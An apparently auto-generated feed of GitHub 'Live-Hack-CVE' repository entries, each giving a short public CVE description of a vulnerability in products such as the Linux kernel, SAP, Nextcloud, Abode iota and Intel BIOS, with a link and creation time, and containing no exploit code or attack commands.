**A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function follow_page_pte of the file mm/gup.c of the component BPF. The manipulation leads to race condition. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3623](https://github.com/Live-Hack-CVE/CVE-2022-3623) create time: 2022-12-28T21:59:22Z

**In PHP versions 8.1.x below 8.1.8, when fileinfo functions, such as finfo_buffer, due to incorrect patch applied to the third party code from libmagic, incorrect function may be used to free allocated memory, which may lead to heap corruption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31627](https://github.com/Live-Hack-CVE/CVE-2022-31627) create time: 2022-12-28T21:58:59Z

**In Wi-Fi, there is a permissions bypass. This could lead to local escalation of privilege from the guest user with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-223377547 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20254](https://github.com/Live-Hack-CVE/CVE-2022-20254) create time: 2022-12-28T21:58:55Z

**MariaDB v10.2 to v10.6.1 was discovered to contain a segmentation fault via the component Item_subselect::init_expr_cache_tracker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32083](https://github.com/Live-Hack-CVE/CVE-2022-32083) create time: 2022-12-28T21:58:48Z

**MariaDB v10.4 to v10.8 was discovered to contain a segmentation fault via the component Item_field::fix_outer_field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32086](https://github.com/Live-Hack-CVE/CVE-2022-32086) create time: 2022-12-28T21:58:45Z

**In Bluetooth, there is a possible cleanup failure due to an uncaught exception. This could lead to remote denial of service in Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-224545125 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20253](https://github.com/Live-Hack-CVE/CVE-2022-20253) create time: 2022-12-28T21:58:32Z

**Due to improper HTML encoding in input control summary, an authorized attacker can execute XSS vulnerability in SAP Business Objects Web Intelligence (BI Launchpad) - version 420. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22546](https://github.com/Live-Hack-CVE/CVE-2022-22546) create time: 2022-12-28T21:58:05Z

**SAP NetWeaver Application Server for ABAP (Kernel) and ABAP Platform (Kernel) - versions KERNEL 7.22, 8.04, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, KRNL64UC 8.04, 7.22, 7.22EXT, 7.49, 7.53, KRNL64NUC 7.22, 7.22EXT, 7.49, does not sufficiently validate sap-passport information, which could lead to a Denial-of-Service CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22543](https://github.com/Live-Hack-CVE/CVE-2022-22543) create time: 2022-12-28T21:57:13Z

**A high privileged user who has access to transaction SM59 can read connection details stored with the destination for http calls in SAP NetWeaver Application Server ABAP and ABAP Platform - versions 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22545](https://github.com/Live-Hack-CVE/CVE-2022-22545) create time: 2022-12-28T21:57:09Z

**Solution Manager (Diagnostics Root Cause Analysis Tools) - version 720, allows an administrator to execute code on all connected Diagnostics Agents and browse files on their systems. An attacker could thereby control the managed systems. It is considered that this is a missing segregation of duty for the SAP Solution M CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22544](https://github.com/Live-Hack-CVE/CVE-2022-22544) create time: 2022-12-28T21:57:06Z

**Use after free in WebGPU in Google Chrome prior to 102.0.5005.115 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2007](https://github.com/Live-Hack-CVE/CVE-2022-2007) create time: 2022-12-28T21:17:36Z

**FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17463](https://github.com/Live-Hack-CVE/CVE-2020-17463) create time: 2022-12-28T20:44:28Z

**AVE DOMINAplus <=1.10.x suffers from an unauthenticated reboot command execution. Attackers can exploit this issue to cause a denial of service scenario. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21996](https://github.com/Live-Hack-CVE/CVE-2020-21996) create time: 2022-12-28T20:44:24Z

**AVE DOMINAplus <=1.10.x suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file '/xml/authClients.xml' and obtain administrative login information that allows for a successful authentication bypass attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21994](https://github.com/Live-Hack-CVE/CVE-2020-21994) create time: 2022-12-28T20:44:21Z

**An issue was discovered in GNU LibreDWG 0.10. Crafted input will lead to an memory leak in dwg_decode_eed ../../src/decode.c:3638. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21839](https://github.com/Live-Hack-CVE/CVE-2020-21839) create time: 2022-12-28T20:44:14Z

**A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10 via read_2004_compressed_section ../../src/decode.c:2379. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21827](https://github.com/Live-Hack-CVE/CVE-2020-21827) create time: 2022-12-28T20:44:08Z

**A heap-based buffer overflow vulnerability in the function ok_jpg_decode_block_progressive() at ok_jpg.c:1054 of ok-file-formats through 2020-06-26 allows attackers to cause a Denial of Service (DOS) via a crafted jpeg file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23707](https://github.com/Live-Hack-CVE/CVE-2020-23707) create time: 2022-12-28T20:43:49Z

**A heap-based Buffer Overflow Vulnerability exists FFmpeg 4.2 at libavfilter/vf_vmafmotion.c in convolution_y_8bit, which could let a remote malicious user cause a Denial of Service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22033](https://github.com/Live-Hack-CVE/CVE-2020-22033) create time: 2022-12-28T20:40:46Z

**A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at libavfilter/vf_floodfill.c, which might lead to memory corruption and other potential consequences. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22034](https://github.com/Live-Hack-CVE/CVE-2020-22034) create time: 2022-12-28T20:40:42Z

**In Pluck-4.7.10-dev2 admin background, a remote command execution vulnerability exists when uploading files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20951](https://github.com/Live-Hack-CVE/CVE-2020-20951) create time: 2022-12-28T20:40:38Z

**Stack overflow vulnerability in parse_array Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18392](https://github.com/Live-Hack-CVE/CVE-2020-18392) create time: 2022-12-28T20:40:34Z

**File Deletion vulnerability in Halo 0.4.3 via delBackup. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19038](https://github.com/Live-Hack-CVE/CVE-2020-19038) create time: 2022-12-28T20:38:33Z

**A heap buffer overflow vulnerability in Ap4TrunAtom.cpp of Bento 1.5.1-628 may lead to an out-of-bounds write while running mp42aac, leading to system crashes and a denial of service (DOS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19721](https://github.com/Live-Hack-CVE/CVE-2020-19721) create time: 2022-12-28T20:38:29Z

**Mikrotik RouterOs before 6.44.6 (long-term tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/cerm process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20221](https://github.com/Live-Hack-CVE/CVE-2020-20221) create time: 2022-12-28T20:38:04Z

**An command injection vulnerability in HNAP1/SetWLanApcliSettings of Motorola CX2 router CX 1.0.2 Build 20190508 Rel.97360n allows attackers to execute arbitrary system commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21937](https://github.com/Live-Hack-CVE/CVE-2020-21937) create time: 2022-12-28T20:38:00Z

**An issue has been found in function XRef::fetch in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a stack overflow . CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19464](https://github.com/Live-Hack-CVE/CVE-2020-19464) create time: 2022-12-28T20:37:57Z

**An issue has been found in function vfprintf in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a stack overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19463](https://github.com/Live-Hack-CVE/CVE-2020-19463) create time: 2022-12-28T20:37:53Z

**A vulnerability in the vae_admin_rule database table of vaeThink v1.0.1 allows attackers to execute arbitrary code via a crafted payload in the condition parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19301](https://github.com/Live-Hack-CVE/CVE-2020-19301) create time: 2022-12-28T20:37:49Z

**Improper Authentication in Lin-CMS-Flask v0.1.1 allows remote attackers to launch brute force login attempts without restriction via the 'login' function in the component 'app/api/cms/user.py'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18698](https://github.com/Live-Hack-CVE/CVE-2020-18698) create time: 2022-12-28T20:37:46Z

**Incorrect Access Control in Lin-CMS-Flask v0.1.1 allows remote attackers to obtain sensitive information and/or gain privileges due to the application not invalidating a user's authentication token upon logout, which allows for replaying packets. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18701](https://github.com/Live-Hack-CVE/CVE-2020-18701) create time: 2022-12-28T20:37:39Z

**A remote code execution (RCE) in e/install/index.php of EmpireCMS 7.5 allows attackers to execute arbitrary PHP code via writing malicious code to the install file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22937](https://github.com/Live-Hack-CVE/CVE-2020-22937) create time: 2022-12-28T20:37:35Z

**Incorrect Access Control in DotCMS versions before 5.1 allows remote attackers to gain privileges by injecting client configurations via vtl (velocity) files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18875](https://github.com/Live-Hack-CVE/CVE-2020-18875) create time: 2022-12-28T20:37:32Z

**A remote code execution (RCE) vulnerability in /root/run/adm.php?admin-ediy&part=exdiy of imcat v5.1 allows authenticated attackers to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22120](https://github.com/Live-Hack-CVE/CVE-2020-22120) create time: 2022-12-28T20:36:32Z

**A stack exhaustion issue in the printIFDStructure function of Exiv2 0.27 allows remote attackers to cause a denial of service (DOS) via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18898](https://github.com/Live-Hack-CVE/CVE-2020-18898) create time: 2022-12-28T20:36:17Z

**A remote code execution (RCE) vulnerability in template_user.php of ZZCMS version 2018 allows attackers to execute arbitrary PHP code via the "ml" and "title" parameters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19822](https://github.com/Live-Hack-CVE/CVE-2020-19822) create time: 2022-12-28T20:36:13Z

**Improper Access Control in Jfinal CMS v4.7.1 and earlier allows remote attackers to obtain sensitive information and/or execute arbitrary code via the 'FileManager.rename()' function in the component 'modules/filemanager/FileManagerController.java'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19155](https://github.com/Live-Hack-CVE/CVE-2020-19155) create time: 2022-12-28T20:36:10Z

**fig2dev 3.2.7b contains a segmentation fault in the gencgm_start function in gencgm.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21535](https://github.com/Live-Hack-CVE/CVE-2020-21535) create time: 2022-12-28T20:36:06Z

**A remote command execution vulnerability exists in add_server_service of PPTP_SERVER in Mercury Router MER1200 v1.0.1 and Mercury Router MER1200G v1.0.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22724](https://github.com/Live-Hack-CVE/CVE-2020-22724) create time: 2022-12-28T20:36:02Z

**fexsrv in F*EX (aka Frams' Fast File EXchange) before fex-20160919_2 allows eval injection (for unauthenticated remote code execution). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15591](https://github.com/Live-Hack-CVE/CVE-2020-15591) create time: 2022-12-28T20:35:59Z

**rConfig 3.9.5 allows command injection by sending a crafted GET request to lib/ajaxHandlers/ajaxArchiveFiles.php since the path parameter is passed directly to the exec function without being escaped. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23151](https://github.com/Live-Hack-CVE/CVE-2020-23151) create time: 2022-12-28T20:35:55Z

**Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.0.11, and 21.0.3, filenames where not escaped by default in controllers using `DownloadResponse`. When a user-supplied filename was passed unsanitized into a `DownloadResponse`, this could be used to trick users into dow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32679](https://github.com/Live-Hack-CVE/CVE-2021-32679) create time: 2022-12-28T21:15:36Z

**Nextcloud Server is a Nextcloud package that handles data storage. Nextcloud Server supports application specific tokens for authentication purposes. These tokens are supposed to be granted to a specific applications (e.g. DAV sync clients), and can also be configured by the user to not have any filesystem access. Due CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32688](https://github.com/Live-Hack-CVE/CVE-2021-32688) create time: 2022-12-28T21:15:33Z

**Nextcloud Server is a Nextcloud package that handles data storage. In versions priot to 19.0.13, 20.0.11, and 21.0.3, Nextcloud Server audit logging functionality wasn't properly logging events for the unsetting of a share expiration date. This event is supposed to be logged. This issue is patched in versions 19.0.13, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32680](https://github.com/Live-Hack-CVE/CVE-2021-32680) create time: 2022-12-28T21:15:30Z

**Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.011, and 21.0.3, there was a lack of ratelimiting on the public DAV endpoint. This may have allowed an attacker to enumerate potentially valid share tokens or credentials. The issue was fixed in versions 19.0.13, 20.0.11 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32705](https://github.com/Live-Hack-CVE/CVE-2021-32705) create time: 2022-12-28T21:15:26Z

**Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.011, and 21.0.3, there was a lack of ratelimiting on the shareinfo endpoint. This may have allowed an attacker to enumerate potentially valid share tokens. The issue was fixed in versions 19.0.13, 20.0.11, and 21.0.3. Th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32703](https://github.com/Live-Hack-CVE/CVE-2021-32703) create time: 2022-12-28T21:15:23Z

**Nextcloud Server is a Nextcloud package that handles data storage. In versions of Nextcloud Server prior to 10.0.11, 20.0.10, and 21.0.2, a malicious user may be able to break the user administration page. This would disallow administrators to administrate users on the Nextcloud instance. The vulnerability is fixed in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32657](https://github.com/Live-Hack-CVE/CVE-2021-32657) create time: 2022-12-28T20:44:05Z

**Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.0.11, and 21.0.3, ratelimits are not applied to OCS API responses. This affects any OCS API controller (`OCSController`) using the `@BruteForceProtection` annotation. Risk depends on the installed applications on the Nex CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32678](https://github.com/Live-Hack-CVE/CVE-2021-32678) create time: 2022-12-28T20:44:00Z

**Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.011, and 21.0.3, default share permissions were not being respected for federated reshares of files and folders. The issue was fixed in versions 19.0.13, 20.0.11, and 21.0.3. There are no known workarounds. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32725](https://github.com/Live-Hack-CVE/CVE-2021-32725) create time: 2022-12-28T20:43:56Z

**Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.011, and 21.0.3, the Nextcloud Text application shipped with Nextcloud Server returned verbatim exception messages to the user. This could result in a full path disclosure on shared files. The issue was fixed in versions CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32734](https://github.com/Live-Hack-CVE/CVE-2021-32734) create time: 2022-12-28T20:43:53Z

**Nextcloud is an open-source, self-hosted productivity platform. Prior to versions 20.0.13, 21.0.5, and 22.2.0, Nextcloud Server did not implement a database backend for rate-limiting purposes. Any component of Nextcloud using rate-limits (as as `AnonRateThrottle` or `UserRateThrottle`) was thus not rate limited on inst CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41177](https://github.com/Live-Hack-CVE/CVE-2021-41177) create time: 2022-12-28T20:43:39Z

**Adobe Creative Cloud version 5.5 (and earlier) are affected by a privilege escalation vulnerability in the resources leveraged by the Setup.exe service. An unauthenticated attacker could leverage this vulnerability to remove files and escalate privileges under the context of SYSTEM . An attacker must first obtain the a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43019](https://github.com/Live-Hack-CVE/CVE-2021-43019) create time: 2022-12-28T20:41:41Z

**Adobe Animate version 21.0.3 (and earlier) is affected by a Memory Corruption vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21071](https://github.com/Live-Hack-CVE/CVE-2021-21071) create time: 2022-12-28T20:41:31Z

**Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a Memory corruption vulnerability when parsing a specially crafted PDF file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21063](https://github.com/Live-Hack-CVE/CVE-2021-21063) create time: 2022-12-28T20:41:27Z

**A flaw was found in the virtio-net device of QEMU. This flaw was inadvertently introduced with the fix for CVE-2021-3748, which forgot to unmap the cached virtqueue elements on error, leading to memory leakage and other unexpected results. Affected QEMU version: 6.2.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26353](https://github.com/Live-Hack-CVE/CVE-2022-26353) create time: 2022-12-28T20:40:56Z

**Unintended intermediary in the BIOS authenticated code module for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33103](https://github.com/Live-Hack-CVE/CVE-2021-33103) create time: 2022-12-28T20:34:04Z

**Uncaught exception in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0190](https://github.com/Live-Hack-CVE/CVE-2021-0190) create time: 2022-12-28T20:34:00Z

**Observable behavioral discrepancy in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33149](https://github.com/Live-Hack-CVE/CVE-2021-33149) create time: 2022-12-28T20:33:57Z

**Insufficient control flow management in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33122](https://github.com/Live-Hack-CVE/CVE-2021-33122) create time: 2022-12-28T20:33:53Z

**Improper access control in the BIOS authenticated code module for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33123](https://github.com/Live-Hack-CVE/CVE-2021-33123) create time: 2022-12-28T20:33:44Z

**Out-of-bounds write in the BIOS authenticated code module for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33124](https://github.com/Live-Hack-CVE/CVE-2021-33124) create time: 2022-12-28T20:33:41Z

**Improper access control for some 3rd Generation Intel(R) Xeon(R) Scalable Processors before BIOS version MR7, may allow a local attacker to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33117](https://github.com/Live-Hack-CVE/CVE-2021-33117) create time: 2022-12-28T20:33:37Z

**An authentication bypass vulnerability exists in the web interface /action/factory* functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP header can lead to authentication bypass. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29477](https://github.com/Live-Hack-CVE/CVE-2022-29477) create time: 2022-12-28T21:15:18Z

**Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via direct UI interactions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2296](https://github.com/Live-Hack-CVE/CVE-2022-2296) create time: 2022-12-28T21:15:14Z

**SAP BusinessObjects Business Intelligence Platform (Open Document) - versions 420, 430, allows an unauthenticated attacker to retrieve sensitive information plain text over the network. On successful exploitation, the attacker can view any data available for a business user and put load on the application by an automat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32245](https://github.com/Live-Hack-CVE/CVE-2022-32245) create time: 2022-12-28T21:15:10Z

**The Duplicate Page and Post WordPress plugin before 2.8 does not sanitise and escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2152](https://github.com/Live-Hack-CVE/CVE-2022-2152) create time: 2022-12-28T21:14:36Z

**The WP All Export Pro WordPress plugin before 1.7.9 does not limit some functionality during exports only to users with the Administrator role, allowing any logged in user which has been given privileges to perform exports to execute arbitrary code on the site. By default only administrators can run exports, but the pr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3394](https://github.com/Live-Hack-CVE/CVE-2022-3394) create time: 2022-12-28T21:14:33Z

**An information disclosure vulnerability exists in the XFINDER functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted man-in-the-middle attack can lead to increased privileges. An attacker can perform a man-in-the-middle attack to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29475](https://github.com/Live-Hack-CVE/CVE-2022-29475) create time: 2022-12-28T20:44:18Z

**An OS command injection vulnerability exists in the web interface util_set_serial_mac functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29472](https://github.com/Live-Hack-CVE/CVE-2022-29472) create time: 2022-12-28T20:43:46Z

**When a user opens a manipulated Adobe Illustrator file format (.ai, ai.x3d) received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9.0, the application crashes and becomes temporarily unavailable to the user until restart of the application. The file format details along with their CVE relevant in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22538](https://github.com/Live-Hack-CVE/CVE-2022-22538) create time: 2022-12-28T20:43:42Z

**The tested version of Dominion Voting Systems ImageCast X does not validate application signatures to a trusted root certificate. Use of a trusted root certificate ensures software installed on a device is traceable to, or verifiable against, a cryptographic key provided by the manufacturer to detect tampering. An atta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1739](https://github.com/Live-Hack-CVE/CVE-2022-1739) create time: 2022-12-28T20:43:35Z

**An OS command injection vulnerability exists in the XCMD setAlexa functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z. A specially-crafted XCMD can lead to arbitrary command execution. An attacker can send a malicious XML payload to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33189](https://github.com/Live-Hack-CVE/CVE-2022-33189) create time: 2022-12-28T20:43:32Z

**Bento4 1.6.0 has memory leaks via the mp4fragment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40884](https://github.com/Live-Hack-CVE/CVE-2022-40884) create time: 2022-12-28T20:43:28Z

**A denial of service vulnerability exists in the XCMD doDebug functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to denial of service. An attacker can send a malicious XML payload to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32760](https://github.com/Live-Hack-CVE/CVE-2022-32760) create time: 2022-12-28T20:43:25Z

**Bento4 v1.6.0-639 has a memory allocation issue that can cause denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40885](https://github.com/Live-Hack-CVE/CVE-2022-40885) create time: 2022-12-28T20:43:21Z

**An OS command injection vulnerability exists in the web interface /action/ipcamRecordPost functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32586](https://github.com/Live-Hack-CVE/CVE-2022-32586) create time: 2022-12-28T20:43:18Z

**An OS command injection vulnerability exists in the XCMD doDebug functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to arbitrary command execution. An attacker can send a malicious XML payload to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32773](https://github.com/Live-Hack-CVE/CVE-2022-32773) create time: 2022-12-28T20:43:14Z

**An OS command injection vulnerability exists in the sysupgrade command injection functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32765](https://github.com/Live-Hack-CVE/CVE-2022-32765) create time: 2022-12-28T20:43:10Z

**An integer overflow vulnerability exists in the web interface /action/ipcamRecordPost functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to memory corruption. An attacker can make an authenticated HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32775](https://github.com/Live-Hack-CVE/CVE-2022-32775) create time: 2022-12-28T20:43:06Z

**A double-free vulnerability exists in the web interface /action/ipcamSetParamPost functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to memory corruption. An attacker can make an authenticated HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32574](https://github.com/Live-Hack-CVE/CVE-2022-32574) create time: 2022-12-28T20:43:03Z

**An OS command injection vulnerability exists in the js_package install functionality of Robustel R1510 3.1.16. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33150](https://github.com/Live-Hack-CVE/CVE-2022-33150) create time: 2022-12-28T20:42:59Z

**A format string injection vulnerability exists in the XCMD getVarHA functionality of abode systems, inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to memory corruption, information disclosure, and denial of service. An attacker can send a malicious XML payload to trigger this vulnera CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35244](https://github.com/Live-Hack-CVE/CVE-2022-35244) create time: 2022-12-28T20:42:56Z

**A format string injection vulnerability exists in the ghome_process_control_packet functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted XCMD can lead to memory corruption, information disclosure and denial of service. An attacker can send a malicious XML payload to trigge CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33938](https://github.com/Live-Hack-CVE/CVE-2022-33938) create time: 2022-12-28T20:42:52Z

**Missing authentication for critical function vulnerability in iSCSI management functionality in Synology DiskStation Manager (DSM) before 7.1-42661 allows remote attackers to read or write arbitrary files via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27623](https://github.com/Live-Hack-CVE/CVE-2022-27623) create time: 2022-12-28T20:42:32Z

**Server-Side Request Forgery (SSRF) vulnerability in Package Center functionality in Synology DiskStation Manager (DSM) before 7.1-42661 allows remote authenticated users to access intranet resources via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27622](https://github.com/Live-Hack-CVE/CVE-2022-27622) create time: 2022-12-28T20:42:29Z

**In AdGuardHome, versions v0.95 through v0.108.0-b.13 are vulnerable to Cross-Site Request Forgery (CSRF), in the custom filtering rules functionality. An attacker can persuade an authorized user to follow a malicious link, resulting in deleting/modifying the custom filtering rules. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32175](https://github.com/Live-Hack-CVE/CVE-2022-32175) create time: 2022-12-28T20:42:26Z

**In "Gin-Vue-Admin", versions v2.5.1 through v2.5.3b are vulnerable to Unrestricted File Upload that leads to execution of javascript code, through the "Compress Upload" functionality to the Media Library. When an admin user views the uploaded file, a low privilege attacker will get access to the admin's cookie leading CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32176](https://github.com/Live-Hack-CVE/CVE-2022-32176) create time: 2022-12-28T20:42:20Z

**Authentication Bypass by Primary Weakness in GitHub repository cockpit-hq/cockpit prior to 2.2.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2818](https://github.com/Live-Hack-CVE/CVE-2022-2818) create time: 2022-12-28T20:42:17Z

**Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0211. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2819](https://github.com/Live-Hack-CVE/CVE-2022-2819) create time: 2022-12-28T20:42:13Z

